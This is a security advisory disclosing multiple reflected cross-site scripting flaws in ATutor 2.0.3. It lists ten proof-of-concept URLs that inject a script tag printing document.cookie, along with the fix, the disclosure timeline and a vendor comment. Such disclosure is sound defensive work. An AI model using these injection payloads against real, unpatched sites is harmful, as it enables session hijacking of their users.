SSCHADV2012-002 - ATutor 2.0.3 Multiple XSS vulnerabilities
|
Advisory:
|
ATutor 2.0.3 Multiple XSS vulnerabilities |
| Advisory ID: | SSCHADV2012-002 |
| Author: | Stefan Schurtz |
| Affected Software: | Successfully tested on ATutor 2.0.3 |
| Vendor URL: | |
| Vendor Status: |
fixed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
ATutor 2.0.3 is prone to multiple XSS vulnerabilities
==============
PoC-Exploit
==============
PoC-Exploit
==============
| http://[target]/ATutor/themes/default/tile_search/index.tmpl.php/" <script>alert(document.cookie)</script> http://[target]/ATutor/login.php/index.php" <script>alert(document.cookie)</script>/index.php http://[target]/ATutor/search.php/index.php" <script>alert(document.cookie)</script>/index.php http://[target]/ATutor/password_reminder.php" <script>alert(document.cookie)</script>/index.php http://[target]/ATutor/login.php/jscripts/infusion/" <script>alert(document.cookie)</script>/index.php http://[target]/ATutor/login.php/mods/_standard/flowplayer/" <script>alert(document.cookie)</script>/index.php http://[target]/ATutor/browse.php/jscripts/infusion/framework/fss/" <script>alert(document.cookie)</script>/index.php http://[target]/ATutor/registration.php/themes/default/ie_styles.css" <script>alert(document.cookie)</script>/index.php http://[target]/ATutor/about.php/" <script>alert(document.cookie)</script>/index.php http://[target]/ATutor/themes/default/social/basic_profile.tmpl.php/" <script>alert(document.cookie)</script>/index.php |
=====
Solution
=====
Solution, Upgrade to ATutor 2.1
================
Disclosure Timeline
================
01-Jan-2012 – vendor informed
01-Jan-2012 – vendor feedback
15-Jan-2012 – no fix available
13-Jul-2012 – fixed by vendor (see comment)
====
Credits
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References
=======
http://atutor.ca/view/3/22740/1.html
Trackbacks
No Trackbacks
Comments
Display comments as Linear | Threaded
greg on :
XXS vulnerabilities resolved. All template links and public forms using $_SERVER[‘PHP_SELF’] filtered to disallow quotes and HTML.
http://atutor.ca/atutor/mantis/view.php?id=4939
http://atutor.ca/view/3/22740/1.html
http://www.darksecurity.de/advisories/2012/SSCHADV2012-002.txt
Solution, Upgrade to ATutor 2.1